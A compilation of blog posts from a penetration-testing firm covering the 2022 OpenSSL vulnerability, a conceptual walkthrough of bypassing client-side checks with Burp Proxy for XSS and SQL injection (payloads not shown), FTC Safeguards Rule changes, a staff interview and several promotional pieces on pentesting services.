UPDATE: Subsequent to publication of this blog post, the OpenSSL vulnerabilities were assigned CVE-2022-37786 and CVE-2022-3602, patches were released by OpenSSL, and the threat level was downgraded from “critical” to “high.”
In the cyberworld, news of a critical vulnerability affecting OpenSSL versions 3.0 – 3.0.6 will likely be the scariest part of Halloween ’22. Especially since the OG ‘critical’ rating from OpenSLL went to the aptly named “Heartbleed” bug from 2014.
There is a lot of buzz online about this vulnerability, but here’s what we know for sure:
It really could be that serious. The OpenSSL project management team says it’s critical, and they are not known for crying ‘wolf’ without reason. By the organization’s standards, ‘critical’ means it may be easily exploitable, many users could be affected, and the destructive potential is high.
So, you definitely need to patch. OpenSSL’s software is ubiquitous in the world of security and encryption. Though 98% of instances are still version 1.1.1, the 1.5% using version 3.0.x includes some very popular Linux distributions, including Red Hat Enterprise Linux (RHEL) 9.x, Ubuntu version 22.04, and many others.
And you need to patch ASAP. OpenSSL is making the patch available tomorrow, November 1, beginning at 8 AM and should be complete by noon U.S. Eastern Time. According to an OpenSSL spokesman, the rationale behind announcing the vulnerability before the patch is ready is to give organizations time to identify the systems that need to be patched and assemble the resources necessary to do so.
How can you be sure that all your relevant systems are patched? Once you’ve installed the updates, a comprehensive assessment of each host can insure you’ve properly updated. As always, a Raxis penetration test can also reveal unpatched or out-of-date software from OpenSSL or any other provider. What’s more, our team can show you proof of what assets are at risk and why.
At Raxis, we believe that great relationships lead to excellent results. As a team of highly skilled engineers, we’re on a mission to provide our customers with real life breach analyses that helps them plug vulnerabilities and create a more secure environment. We’re the firm of choice for companies that are looking for cybersecurity assessments from a firm that delivers on its promise.
As we work closely with our clients to bolster their cybersecurity, we’re always happy to hear from them about their impressions of our work and how well we were able to help them improve security. With that in mind, we’re delighted to have acquired our first-ever 5-star review on Clutch.
For context, Clutch is a B2B ratings and reviews platform dedicated to publishing helpful content about their registered providers. The team of analysts collects and evaluates feedback from buyers that have worked with these service providers. Clutch guarantees that each review it publishes is unbiased and accurate.
Our first review comes from a background screening company. Our ongoing relationship with the client began in 2015. They engaged with us for auditing services, vulnerability assessments, security analysis, and penetration testing services. Since we’ve started working together, we’ve proven to the them that we deliver high-quality results on time, every time. The client has expressed their satisfaction with us meeting — and many times exceeding — expectations. That’s because our focus is on their real needs, not our own preferences.
“I consider their focus — specifically in terms of penetration testing — to be an incredible strength of theirs. Raxis’ resources and methodologies are built around testing, security, and all other aspects associated with these things. Their members are skilled, extremely passionate, and dedicated to their work.”
CISO, Background Screening Company
We’re truly honored to hear the positive sentiments from our client because it means we’re addressing the real need — keeping them secure — and not simply checking boxes.
Don’t forget to read the full review on our Clutch profile to learn more about this project. Also, we’re listed on The Manifest as a top 100 cybersecurity company in Atlanta. The Manifest is Clutch’s sister site that focuses on highlighting vendors’ most notable projects.
If you’re interested in working with our team, please send us an inquiry, and we’ll set up a conversation to see how we can help you.
People are often surprised to find that a hacker doesn’t only attack a website through the authentication process. Our team members are experts at demonstrating why just enforcing password policies and lockout times doesn’t fully protect applications.
In this article, we’re going to pull back the curtain and show you how hackers use web proxy tools to help exploit applications in ways you might never expect.
How the Proxy Tool Works
The proxy tool is software that follows the path data takes step-by-step from your device to the application server. Several such tools exist, but Burp Proxy (included in all versions of Burp Suite) is one of the most popular. Using Burp Proxy, hackers can bypass the user interface – the page you see when entering data – and change the information before it is sent to the application server. This makes it possible to avoid client-side controls, such as those that check that a phone number is only numeric or that an email address is formatted correctly. If the application server expects the client-side controls to have already validated data, the server code may not have all of the proper protections in place.
In the image below, Burp Proxy, in “Intercept” mode, shows each step along the path that data follows from your device to an application server. The tool allows a user to tab from step to step and change the data that was input originally. If security features are built into the client (the interface you see) but not present on the application server, the proxy enables hackers to enter compliant data first, but change it however they want before it reaches the server.
One example of how hackers exploit this setup is through the commonly used buttons or checkboxes found in many apps. Most app developers are cautious about user input fields, but, because buttons, checkboxes, and radio buttons apparently limit data entry to “on-off” or “yes-no” choices, they often see little inherent risk. The problem is that, even though the user options are limited at the interface (client-side), they may not be limited by the code on the server itself (server-side).
How a Proxy Tool can Reveal a Vulnerability
The three illustrations below show how even a simple “submit” button can present opportunities for hackers.
The choice here seems straightforward — either you click the button or you do not. But that choice masks what happens after you click “submit.”
“Submit” is really just a request being sent to the server. Here, using Burp Proxy to intercept the data, we can see the request as it will appear to the application server.
Now, rather than a simple yes-or-no choice, a user can modify the data any way they’d like and enter it by pressing the “Forward” command.
How Hackers Turn the Exploit into an Attack
With the ability to effectively bypass safeguards on the client-side interface, hackers can send information directly to the application server. Here are a couple of examples of the types of attacks they can execute if the application server is not secure. (For clarity, we’ll use text-based fields, rather than check-boxes in these examples.)
Example 1: Cross-Site Scripting (XSS)
Cross-site scripting (XSS) is a reflected attack that injects malicious client-side executable code into web application parameters to be returned by the application output and ultimately executed by the browser. Because it appears that the script is from a trusted source, the end-user’s browser accepts it and runs the script, permitting the attacker to take actions on the application’s behalf, such as accessing cookies and session tokens as well as other sensitive data. (Source: Raxis Glossary).
The following walk-through demonstrate how a simple guestbook submission form request works normally and then how an attacker can use a web proxy to insert malicious code.
This is the submission form as it appears to users:
Our Burp Proxy tool reveals the actual request sent to the application server:
Here the attacker enters an innocuous submission that should not be caught by client-side injection controls:
And now the attacker captures the entry using Burp Proxy:
Before allowing the proxy tool to move to the next step, the attacker replaces the original harmless data with a malicious script:
The application server, without server-side controls to stop it, accepts the script and returns the payload to the browser. This is what the attacker sees in Burp Proxy:
And here we see the successful cross-site scripting result in the browser:
Example 2: SQL Injection (SQLi)
In this attack, a SQL query is injected into the application via input parameters. A successful attack could read sensitive data from the database, modify data in the database, execute operations on the database (including administrative operations), recover files on the DBMS file system, or issue commands to the operating system. (Source: Raxis Glossary)
Here we demonstrate how a user ID field can be manipulated to enable a SQLi attack.
We start with a simple user ID entry field with a submit button where we enter a name and submit:
Again the attacker intercepts the submission using Burp Proxy en route to the application server.
As above in the XSS exploit, the attacker then modifies the data in Burp Proxy, this time to include escape characters and a SQL query:
With no server-side controls in place to stop the attack, the server returns the data requested in the SQL database query. This is what the attacker sees in Burp Proxy:
And here we see the successful SQL injection result in the browser:
Summary
It’s tempting here to focus on the Burp Proxy tool and its capabilities, but the more important point is to recognize that vulnerabilities can exist in places we as users might not think. Something that seems innocuous, like a simple submit or on/off button, can be manipulated by a hacker with relative ease. The same is true for any field, button, or widget that sends a request to an application server.
Remember that the mindset of a hacker is always to look at something as it’s expected to be used, then attempt to use it differently. That’s why pentesting by skilled professionals is so important. It takes trained, ethical hackers to prevent the work of their malicious counterparts.
Would you like to learn how Raxis can help your organization? Reach out. We have a guaranteed, no-pressure approach, and – after all – we’re all on the same side.
After years of development and public input, the Federal Trade Commission (FTC) in December finalized some changes to the Standards for Safeguarding Customer Information (Safeguards) Rule – a key part of the Gramm-Leach-Bliley Act (GLBA).
Of the four major rule changes, one simply adds a new category of business under the definition of “financial institution,” another exempts institutions that serve fewer than 5,000 people, and a third standardizes some terminology across agencies.
Though all of these are important for various reasons, the most significant changes from Raxis’ perspective are the ones that more clearly define the elements of the information security programs required by GLBA and which ensure better accountability for implementing and testing such programs.
The Problems
In the past, the federal government was reluctant to be overly prescriptive with its cybersecurity requirements. The prevailing mindset was that doing so would mean compliance would happen by “magic” – in this case, meaning mindless activities guaranteed to inspire complacency. Flexibility was necessary to ensure that institutions were free to adopt the practices that ensured the best protection for their company or niche.
The reality we’ve witnessed during more than a decade of Raxis penetration testing is that the level of cybersecurity awareness and sophistication can vary wildly among financial institutions, regardless of size or business model. Ambiguity in the regulations allowed a patchwork of cybersecurity measures to emerge under the general umbrella of compliance. It was clear to our team that the Safeguards Rule needed to be more specific to make sure all the institutions were implementing the most basic best practices.
Lack of specificity in the prior iterations of the rules also made it harder for regulators and the institutions themselves to know whether their infosec programs were effective. Along with more specifics, the institutions needed stronger accountability measures.
The Improvements
Toward the goal of greater accountability, the Safeguards Rule added two important provisions: Designation of a single “qualified individual” to act as a de facto chief information security officer (CISO) to manage the infosec program and a requirement that he or she report to the company’s board. Most institutions have those functions covered in some form or fashion, but we’ve seen instances where responsibilities were split among employees and even departments.
Having a qualified infosec leader in place is a good first step toward consolidating authority, but more important is how well and how quickly the institutions adopt the following changes to the Safeguards Rule:
Review of access controls. This change requires institutions to regularly test digital and physical access to customer data to make sure only authorized personnel can see it – and see only the parts of it that are necessary to do their jobs. If a Raxis team member successfully breaches your network during a test, you can bet we will check to see if you’ve followed the principle of least privileged access.
Inventory of key data and systems. The inventory process ensures that institutions know what they are protecting with their infosec program. As we discussed in a prior post, it’s not always obvious what data and what systems are at risk.
Intrusion detection. This change makes annual pentesting and semi-annual vulnerability assessments a requirement for companies that don’t have continuous monitoring of their networks. Raxis offers all the services described above, but we don’t believe they should be presented as either/or choices. Continuous monitoring or vulnerability assessments should trigger a pentest if serious vulnerabilities are discovered.
Secure application development. With this rule change, the FTC outlines some best security practices for in-house and third-party app development. As we explained in some recent posts, public-facing web applications face some unique security challenges, and it’s good that the FTC understands the seriousness of that issue.
Incident response planning. This update simply requires that institutions develop written plans for responding to security incidents and includes information about what those plans should cover.
Encryption requirement. This may seem like a no-brainer, but the Safeguards Rule now requires encryption of data in transit and at rest. But it also provides for the ability of the “qualified individual” to authorize an acceptable alternative if encryption isn’t feasible.
Multifactor authentication (MFA) requirement. Again, this would appear to be table stakes for a financial institution, but based on Raxis’ experience, it has not been adopted nearly as widely as it should have been already. The rule change, we hope, will make MFA a standard practice industrywide.
Change management procedures outline the steps financial institutions should take when they alter their infosec programs. As a security measure, this ensures such changes are documented and approved beforehand.
This is just a snapshot of what Raxis considers the FTC’s most impactful changes to the GLBA Safeguards Rule. Like all such regulations, they should all be viewed by the institutions as minimum guidelines, not as a safe harbor or assurance of security. Similarly, regulators should judge compliance not by whether the boxes have been checked, but by how thoroughly the institutions have prepared themselves for the attacks that are coming.
There is no finish line in cybersecurity, but these changes will give all US financial institutions a head start on better protection for their customers.
To read the full Safeguards Rule as finalized, be sure to visit the Federal Register.
I’m Brad Herring, VP of business development for Raxis. In that role, I work very closely with our marketing specialist on a near-daily basis. So, our interview was more like an extension of our normal conversations. And that’s one of the great things about working with Raxis – we’re a tight-knit team. We’re professionals who are also friends and family-of-choice. If that sounds like a work environment you’d enjoy, please subscribe to our YouTube channel and check our careers page to learn more.
Jim: Brad, in many cases, you’re the first Raxis team member customers interact with. That seems like it would be incredibly hard.
Brad: Actually, it’s one of my favorite parts of the job.
Jim: I meant for the customers.
Brad: Ha! Yes, for them I’m sure it’s very hard. But once they’re done with me, they get to deal with Tim (Semchenko) and our engineers. So, there’s light at the end of that tunnel.
Jim: Raxis has a lot of new and repeat business, so I’m obviously joking. Tell us more about why you enjoy working with customers and potential customers.
Brad: It’s because I know that we’re genuinely helping them become more secure and, by extension, making the world a little bit better place. I know that sounds hokey, but it really is true.
Jim: You’re doing sales, but that’s not really your background. How did you land in this role?
Brad: I really enjoy telling the story about how our CEO, Mark Puckett, has been a friend since childhood. We’ve always shared a love for computers and cars. After he founded Raxis, he asked for my take on a different business venture he was considering. He decided against that opportunity, but Mark told me that he thought I would be a good fit for Raxis. I said, “Anything but sales.”
Jim: Yet, here you are!
Brad: That goes to show how good Mark is at selling.
Jim: But you are a storyteller at heart and you have a strong technical background as well.
Brad: Yes, my background is in theater. My actual major at Kennesaw State was in Acting and Directing. (I also minored in business law, just to keep people guessing.) And, believe it or not, storytelling is a lot of what I do when I’m speaking with customers. I never know how much technical knowledge someone is bringing to the table, so I have to be sure I understand the technical parts of our job well enough to explain it to people who have little or no expertise on the subject.
Jim: But you also have to work with CIOs and CISOs who live and breathe this stuff.
Brad: Yes, I do. And that’s where I’m fortunate that much of my theater career was spent in the more technical realms of sound and lighting. I owned two companies and did a lot of work for theaters, both indoor and outdoor, as well as houses of worship. A lot of that work is computer-driven, and the technology is based on network protocols.
Jim: I’m sensing that your early love of computers helped pull you in the technical direction, at least in part.
Brad: Absolutely! My first computer was an old Commodore VIC-20 with no storage media. So, if you wanted to play a game, for example, you had to type in pages of commands from books, debug them, hope the power didn’t go out, and then watch all that work disappear when you switched it off. I remember digital cassette recorders as life-changing technology. Then modems came along and gave guys like Mark and me an opportunity to share our passion and connect with others. And, really, those computer-to-computer connections were the origin of the Internet and the main reason why penetration testing is so necessary now.
Jim: What does a typical day at work look like for you.
Brad: You know me. Nothing about me or my work is ever ‘typical’ — and I wouldn’t have it any other way. I do spend a lot of time negotiating with customers — again, making sure that we’re selling them what they need. I’m also involved, as you know, in marketing our services. I still enjoy production work, creating videos that showcase our talented team members, and checking in with other company leadership to make sure we’re on the same page.
Jim: You also have a lot of projects around the house to keep you busy, right?
Brad: My home and property are projects. In fact, sometimes it seems like my life is a project. We have chickens and a garden to tend. I just got done rebuilding an antique tractor that our CTO, Brian Tant, gave me. There are boats to tinker with, a jeep to keep alive, and a lot of carpentry and metal work that keeps me busy.
Jim: And you still have time for your faith and your family.
Brad: Yes. Those are the most significant treasures in my life, and I’m very fortunate that Raxis gives me the flexibility and time I need to nurture them. I’m also privileged to work for the ‘good guys’ in this world and help my children understand the importance of standing up for what’s right. Ultimately, I think that’s what determines whether or not a job is fulfilling and worthwhile — I know that the world is a better place because Raxis is here.
One thing that sets Raxis apart is that our pentesting team is made up of engineers who performed varying roles creating and supporting IT systems before they became pentesters. This includes several engineers who have strong backgrounds in software and web development.
Even better, Raxis is proud to have a close-knit team of pentesters who collaborate and share their ever-growing knowledge with each other and with our customers. You may have a former web developer performing your test, and that person can easily reach out to a former network admin. They can share info about the most secure web app features as well as how the supporting network should be configured securely..
Our customers repeatedly tell us how much they appreciate this because it directly translates to relevant, actionable findings. It also encourages natural conversation between their development teams and the security engineers here at Raxis.
How does this collaboration help customers?
A recent test we conducted provides a great example: We identified several findings, and the customer was very pleased with the process. Upon follow-up, our sales team found out that the customer saw a small performance reduction after implementing our recommendations. From the customer’s perspective, enhanced security was worth the small drop in performance.
Because of our development background, however, Raxis’ team members knew that didn’t have to be the case. Our project manager proactively set up a call with the customer to discuss. Result: The customer remediated using Raxis’ advice and regained all of the original performance. They told us they appreciated how Raxis “went the extra mile.”
To us, that’s just business as usual.
How many application tests do we do?
Customers often ask about our application testing process. Application testing accounts for over 50% of our penetration tests. Last year, we performed over 600 application tests. Like all of our assessments, each test is custom tailored to the customer’s application and overall objectives. This could mean testing the entire app, a portion of the app, or following the app throughout the entire development cycle.
What is your methodology?
Like all of our assessments, our application tests are primarily manual attack simulations against a customer’s application. Where you see an email field, we see an opportunity for cross-site scripting. Aside from our own experience and expertise, Raxis applies the OWASP framework to our penetration testing, including (though, of course not limited to) the following assessment categories:
Access Control
Authorization and Authentication
Session Management
Configuration Management
Error Handling
Sensitive Data Exposure
Input Validation, Injection and Cross-Site Scripting
Root Cause Analysis / Reporting
So, what do I get out of this?
At the end of a Raxis application assessment you get peace of mind and a solid deliverable. Our reports align with the NIST standard, so they meet regulatory compliance standards. The reports feature an executive summary, engagement storyboard (where applicable), and detailed vulnerability findings that include screenshots, risk explanations, remediation recommendation, and risk scoring.
Is your web app security keeping you awake at night?
We understand. Just as we are known for excellence in pen testing, we’re also known for our no-pressure sales and scoping process. We get it. We don’t like to be harassed, and we know you don’t either. If you’d like to start a conversation with one of our experts to help understand the possibilities for your project, feel free to reach out. We’d love to help.
To me, the scariest movies are ones where the ghost/monster/alien turns out to be someone we’ve come to know and trust. The same thing is often true with cyberthreats – the people who can do the most damage to your organization, whether intentionally or not, are your own employees. During Raxis red team engagements, company employees are one of the most reliable ways we have to gain access to the corporate network.
Believe me, after thousands of penetration tests over the years, Raxis has lots of stories – and I intend to tell some.
Next Wednesday, our friends at Curricula, an Atlanta-based cybersecurity training company, will launch their first annual “Curriculaville” remote cybersecurity summit. The free, one-day event starts at 11 AM and will feature a number of experts from the information security space. I’m proud to represent the Raxis team as part of a panel discussion entitled, “Scary Security Stories” that will begin at 1 PM.
This is the time of year for tales that send chills up your spine and raise goosebumps on your skin. If you haven’t trained your employees properly and put effective cyber defenses in place, well . . . let’s just say you might be in for a quite a fright.
The good news is that Raxis stories usually have happy endings. We might steal some passwords and take over your domain, but 99% of the time, we leave your soul intact. And, we’ll show you how to avoid the real bad guys who will take that and more if they can.
Please check out the link and sign up for this informative, educational event at Curriculaville. After all, hearing our scary stories might just keep you from living one of your own.
When it comes to pen testing, it’s easy to get confused about the differences between an external network pen test and a web application pen test.
In this video, I sit down – via zoom – with Chief Operating Officer Bonnie Smyre to discuss the differences between the two.
Here’s a quick overview of the two tests.
What is an external pen test?
An external network penetration test is fairly broad and looks at the overall corporate cybersecurity environment. It is an attempt to find all the ways someone could get into your network without having any type of access. Testers look for any gaps they can find and explore ways they might exploit them.
What is a web application pen test?
A web application pen test is much more focused on the application itself, exploiting it in ways that were never thought of during the development stage. For example, testers will start trying to find ways into different areas using credentials that have different access points. They want to know if different credentials can get them into areas where they may not belong, while also searching the application for any other vulnerabilities.
So which pen test do you need? Hopefully, the answer is much clearer now. If you have a web application and you want to vet it thoroughly, you need the web application pen test. If you are looking for any vulnerability that might give a hacker access to your data, you should consider the external pen test.
One of the many advantages to having a third party like Raxis come in and test is that it offers you a new perspective and a fresh set of eyes. Raxis testers come in with no expectations other than information they want.
A Raxis penetration test will assess your security posture using a combination of tools, techniques and mischief in pursuit of gaining full control of your network. But Raxis doesn’t stop there. Once weaknesses are found, the Raxis team is here to help you make corrections and secure your network. Find out more about our pen testing experience, or contact us to learn more.
Armed with nothing more than an ordinary can of cool, compressed air, a hacker can gain entry to a key-card-only access facility in just 19 seconds. Skeptical? See for yourself in this video.
Fortunately, the guy in this video is me. Our company, Raxis, is a team of ethical hackers and penetration testing experts who evaluate and identify solutions that help businesses safeguard their sensitive data, from healthcare to finance to innovative product and app development.
Some folks forget that physical security is the first line of defense for a cyberattack. If someone can get inside your business, they can find your servers, and in seconds they can steal, sell, and destroy data you’ve invested thousands in protecting.
Our cybersecurity specialists have studied for years to find hidden, unscrupulous techniques that the world’s most sophisticated hackers use. Solving these puzzles and preventing cyberattacks is what we love to do – but often we find security vulnerabilities long before we get to delve deep.
Finding a failure in your company’s security isn’t something to fear; it’s something to fix. And you can only fix something when you know it is broken.
Follow us on this blog or social media and we’ll share more ways that hackers can get in — and how we can help you keep them out.
Most of us understand by now (hopefully) that this COVID-19 emergency is not the time to take chances with our health and safety. The benefits of being disease free far outweigh the costs of some social distancing and extra diligence about hygiene. However, I’m worried that many companies don’t seem to make the connection between what they’re doing to protect their employees and what they should be doing to protect their data.
That’s dangerous because hackers are heartless. In their world, COVID-19 doesn’t bring suffering and death; to them, it’s all about opportunity and wealth. Like a virus, they’re attacking the most vulnerable and leaving untold damage in their wake.
Unfortunately, we’ve seen and heard about companies across America that are making hackers’ jobs easier. For example, the additional strain of accommodating remote workers has caused many IT departments to open ports and grant access that they would never allow normally.
RDP, VPN, oh my!
One common problem is companies opening remote desktop protocol (RDP) access, which can be easily exploited. Others have VPN configuration errors that slow network traffic, frustrate users, and put pressure on IT staff to relax security measures in order to improve productivity. And some are not monitoring network traffic, which can open the door to brute force attacks. Raxis is seeing this firsthand in many of our external and remote internal penetration tests we are currently conducting for our customers.
Add to this the challenge of team members accessing the network with their home devices. Each one brings with it a high degree of risk that most office-based IT teams aren’t accustomed to managing at scale.
The bad guys know all this, of course. That’s why we’ve seen a surge of attacks, many based on the COVID-19 emergency itself. Scammers know we’re scared, tired, and worried for ourselves and our loved ones. We’re more likely to click on a malicious link or reveal sensitive information – and less likely to have appropriate safeguards in place when we do.
Where to start
So, what’s the solution? Our previous posts in this series have talked about ways to make networks more resilient from a technological perspective. But this is also a time when IT pros have a responsibility to safeguard their companies infrastructure and protect their employees. It’s up to you to make sure that productivity doesn’t come at the expense of security, even if that isn’t what your C-suite leaders or colleagues want to hear right now.
The good news is that you don’t have to go it alone. Raxis experts can help you discover and document any unintended security consequences that come from your team working remotely. We can provide a fresh, hacker’s-eye evaluation of your perimeter defenses along with continual assessments to make sure they remain effective. We also offer many remote solutions that go hand in hand with the new workplace guidelines for many of our customers.
Just as the coronavirus has made us more careful about our physical health, the resulting work-from-home experience should make us much more conscious of our cybersecurity posture. Give us a call and let’s talk about how Raxis can help you emerge from this crisis more secure and more confident about working remotely.
Brad Herring and Scott Sailors had the pleasure to present at the (ISC)² Atlanta Chapter Meeting last Thursday. The topic was on Social Engineering and understanding how the high success rates of social engineering impacts network security. Herring and Sailors shared the most common attack vectors, which include phishing, spear phishing, vishing, physical with a pre-text bias and physical with a technology bias.
The members were shocked at the 90% success rate Raxis sees with social engineering across all verticals and business size. Further sobering is the fact that, once Raxis gains access to an internal network, our team is successful in achieving an “impactful breach” 85% of the time.
Once the realization hit that determined and skilled hackers are commonly able to breach armed security, card keyed systems, numeric keypads and other physical controls, it became apparent the importance of achieving and maintaining a strong internal network security program.
This engaging meeting facilitated many conversations about physical security as well as the effectiveness of a mature phishing campaign. The group was able to heighten their awareness of the types of attacks to which businesses often fall prey, understand the behind the scenes actions that take place once credentials or access is achieved, and discuss meaningful remediation steps for combating these attacks.
Penetration testing is so important for businesses today. Almost every day we see companies in the news after the result of a big hack. The aftermath is ugly – lawsuits, loss of trust, downtime and, in many cases, the hacked entity finds itself out of business.In a recent interview with an IT management firm, I was told that many of their customers (mostly SMB) didn’t want a penetration test because they knew they would fail. I see this same reaction in larger companies as well.
This fear of failure is the wrong way to look at penetration testing. At Raxis, we say it all the time, “You can’t fix what you don’t know is broken.” Penetration testing should not be looked at as something that points out your failure; rather it should be embraced as something that helps you get better.
Vulnerabilities are common
We see many of the same vulnerabilities across the nation. Many of them are simple to remediate. Most of them have escaped the attention of the IT team for any number of reasons, but most of all because the IT team is simply busy. Most teams are over worked and under staffed. The workload is high. As a security professional you have to get it right 100% of the time – however, the hacker only has to get it right once.The fear of failing is misplaced. Almost every penetration test will show vulnerabilities or, at the very least, likely attack vectors that could be exploited given more time. Finding vulnerabilities should not be seen as a failure but rather as a responsible approach to better security.
Penetration testing should be about partnership
A penetration test is a valuable tool to help a security team more efficiently locate vulnerabilities, and, if you’ve partnered with a good company, it will offer remediation recommendations helping you efficiently fix the vulnerabilities.A good penetration testing company offers insight and help, not a judgment.I like to call our penetration tests an assessment. That’s truly a better word. We don’t test our customers as much as we partner with them. Raxis is the watchful eye that helps your company stay out of the news. We help you safeguard your data, and we help you maintain trust with your customers.
Penetration testing should be a holistic approach
When a hacker looks at your company, they are taking a holistic approach, and they are going to go for the easiest method with the least amount of risk that they can find. Common attack vectors include:
Social Engineering
WiFi Systems
Internal and External Networks
Mobile Applications
Web Applications
API’s
Each of these areas allows escalation to others. While often viewed as independent systems, the reality is that a weakness in one often leads to a breach in another.Security is hard. This is why it’s so important to partner with a reputable penetration testing company that you can trust. I urge you to not look at penetration testing as the enemy but rather the relief you and your team so desperately need.Learn more about how our penetration tests work.
